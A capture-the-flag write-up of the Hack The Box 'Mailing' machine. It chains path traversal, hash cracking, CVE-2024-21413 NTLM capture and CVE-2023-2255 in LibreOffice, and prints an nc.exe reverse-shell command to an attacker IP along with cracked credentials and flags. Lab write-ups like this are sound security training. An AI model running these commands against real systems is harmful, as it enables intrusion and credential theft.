HTB - Mailing

Machine Description

Mailing is an easy Windows machine that runs hMailServer and hosts a website vulnerable to Path Traversal. This vulnerability can be exploited to access the hMailServer configuration file, revealing the Administrator password hash. Cracking this hash provides the Administrator password for the email account. We leverage CVE-2024-21413 in the Windows Mail application on the remote host to capture the NTLM hash for user maya. We can then crack this hash to obtain the password and log in as user maya via WinRM. For privilege escalation, we exploit CVE-2023-2255 in LibreOffice.

Enumeration

---

Scope

IP Address 10.10.11.14

Nmap Scan

• From Machine name, I can guess there is mailing services running on that machine, So I'll scan known mailing ports first

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ nmap -p25,110,143,465,993,995 $ip  -Pn 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-27 18:48 EDT
Nmap scan report for 10.10.11.14
Host is up (0.45s latency).

PORT    STATE    SERVICE
25/tcp  open     smtp
110/tcp open     pop3
143/tcp open     imap
465/tcp open     smtps
993/tcp open     imaps
995/tcp filtered pop3s

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ nmap -p5985,5986 $ip -Pn                                          

PORT     STATE    SERVICE
5985/tcp open     wsman

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ nmap -F $ip -Pn         

25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
135/tcp open  msrpc
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
465/tcp open  smtps
587/tcp open  submission
993/tcp open  imaps

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ nmap -p- --min-rate 10000 $ip -Pn -v -oN all_ports_scan

PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
465/tcp   open  smtps
587/tcp   open  submission
993/tcp   open  imaps
5040/tcp  open  unknown
5985/tcp  open  wsman
7680/tcp  open  pando-pub
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
57845/tcp open  unknown

* Open ports: 25, 80, 110, 143, 445, 139, 465, 587, 993
* UDP Open ports: No udp port
* Services: smtp - http - imap -pop3 - rpc - smb - imaps - smtps - winRM
* Versions:hMailServer smtpd - IIS httpd 10.0 - hMailServer pop3d 
* Important Notes: No kerberos or ldap, There is no AD
* 5040/tcp  open  unknown
* 7680/tcp  open  pando-pub?

HTTP Enumeration

I tried subdomain enumeration but no results

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip -H "Host: FUZZ.mailing.htb" -t 200 -fs 4681

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

:: Progress: [19966/19966] :: Job [1/1] :: 34 req/sec :: Duration: [0:07:32] :: Errors: 0 ::

http://mailing.htb

Possible Username

I hover on Download Instructions Button and It seems like LFI

I opened burp and intercept the request, change the file name to include:\Windows\System32\drivers\etc\hosts and I get a hit

I also try to includedownload.php to see the function of that file and I found the folder path we are in C:\wwwroot\instructions\

RPC & SMB Enumeration

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ rpcclient -U "%" $ip
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ smbclient -N -L //$ip           
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ enum4linux $ip
[E] Can't find workgroup/domain

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB         10.10.11.14     445    MAILING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         10.10.11.14     445    MAILING          [-] MAILING\: STATUS_ACCESS_DENIED
SMB         10.10.11.14     445    MAILING          [-] Error enumerating shares: Error occurs while reading from remote(104) 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ crackmapexec smb $ip -u guest -p guest --shares                                          
SMB         10.10.11.14     445    MAILING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         10.10.11.14     445    MAILING          [-] MAILING\guest:guest STATUS_LOGON_FAILURE  

SMTP & IMAP & POP3

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ openssl s_client -connect $ip:imaps

[.. snip ..]
depth=0 C=EU, ST=EU\Spain, L=Madrid, O=Mailing Ltd, OU=MAILING, CN=mailing.htb, emailAddress=ruy@mailing.htb

[.. snip ..]

• Got an email address ruy@mailing.htb

• Get installation path after install the server locally and the setting file name from docs ..\..\..\Program+Files+(x86)\hMailServer\bin\hMailServer.ini

AdministratorPassword=841bb5acfa6779ae432xxxxxxxxxxx
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c

Fire up hashcat and hashid to identify the attacke mode

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ hashid -m 841bb5acfa6779ae4xxxxxxxxxxxxxxx                                    
Analyzing '841bb5acfa6779ae432fdxxxxxxxxxxxxxx'
[+] MD2 
[+] MD5 [Hashcat Mode: 0]

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ hashcat -m 0 841bb5acfa6779ae432fd7a4e6600ba7 /usr/share/wordlists/rockyou.txt

841bb5acfa6779ae432fdxxxxxxxxxxx7:homenetworkingxxxxxxxxxxxxxxxx

Session..........: hashcat
Status...........: Cracked

I managed to crack one hash but not the other

So, here we have credentials for SMTP server administrator:homenetworkingxxxxxxxxxxr. I'll fire up thunderbird and connect to the server

SUCCESS :)

I get a hint for a vulnerability that enable my to get users hashes, here is the link:

GitHub - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability: Microsoft-Outlook-Remote-Code-Execution-VulnerabilityGitHub

Try sending emails to the three usernames (ruy, maya, ..etc) found and one of them would work

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ python3 /opt/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/CVE-2024-21413.py --server $ip --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.16.31\file.txt' --subject "Looks pretty"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ sudo responder -I tun0

[.. snip ..]

[SMB] NTLMv2-SSP Client   : 10.10.11.14
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash     : maya::MAILING:584ad9a037446ce1:AC7290481500283F8BF4C205B1468F7E:010100000000000080BB79A2DFC8DA0113ABCDABCFDFB9460000000002000800450038004E00580001001E00570049004E002D0038005600300053004100470050004B0058003900480004003400570049004E002D0038005600300053004100470050004B005800390048002E00450038004E0058002E004C004F00430041004C0003001400450038004E0058002E004C004F00430041004C0005001400450038004E0058002E004C004F00430041004C000700080080BB79A2DFC8DA0106000400020000000800300030000000000000000000000000200000E5BC859A2847AFB05BB50271690023770B9923C8BA762B2DEC7F40B77DDD9B8A0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00330031000000000000000000

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

MAYA::MAILING:584ad9a037446ce1:ac7290481500283f8bf4c205b1468f7e:010100000000000080bb79a2dfc8da0113abcdabcfdfb9460000000002000800450038004e00580001001e00570049004e002d0038005600300053004100470050004b0058003900480004003400570049004e002d0038005600300053004100470050004b005800390048002e00450038004e0058002e004c004f00430041004c0003001400450038004e0058002e004c004f00430041004c0005001400450038004e0058002e004c004f00430041004c000700080080bb79a2dfc8da0106000400020000000800300030000000000000000000000000200000e5bc859a2847afb05bb50271690023770b9923c8ba762b2dec7f40b77ddd9b8a0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00330031000000000000000000:m4y4nxxxxx
Session..........: hashcat
Status...........: Cracked

Shell as Maya

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ evil-winrm -i $ip -u maya -p m4y4nxxxxx
Evil-WinRM shell v3.5

*Evil-WinRM* PS C:\Users\maya\Documents> 

*Evil-WinRM* PS C:\Users\maya\Desktop> type user.txt
e5e110f97bdfbee7f1xxxxxxxxxxxxxx

User flag e5e110f97bdfbee7f1xxxxxxxxxxxxxx

---

Shell as localadmin

Looking at installed program there is an odd one.

*Evil-WinRM* PS C:\program files\libreoffice> cat readmes\readme_es.txt
======================================================================
Léame de LibreOffice 7.4

┌──(kali㉿kali)-[~/…/HTB/machines/Mailing/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'C:\Users\Public\nc.exe 10.10.16.31 443 -e cmd' --output "exploit.odt"

*Evil-WinRM* PS C:\Important Documents> upload exploit.odt
*Evil-WinRM* PS C:\Important Documents> upload nc.exe

┌──(kali㉿kali)-[~/…/HTB/machines/Mailing/CVE-2023-2255]
└─$ rlwrap nc -lvnp 443

listening on [any] 443 ...
connect to [10.10.16.31] from (UNKNOWN) [10.10.11.14] 53112

(c) Microsoft Corporation. All rights reserved.
C:\Program Files\LibreOffice\program>whoami                                                                        
mailing\localadmin      

Root flag: 499f2a971e0cb91baab16e344692dc9a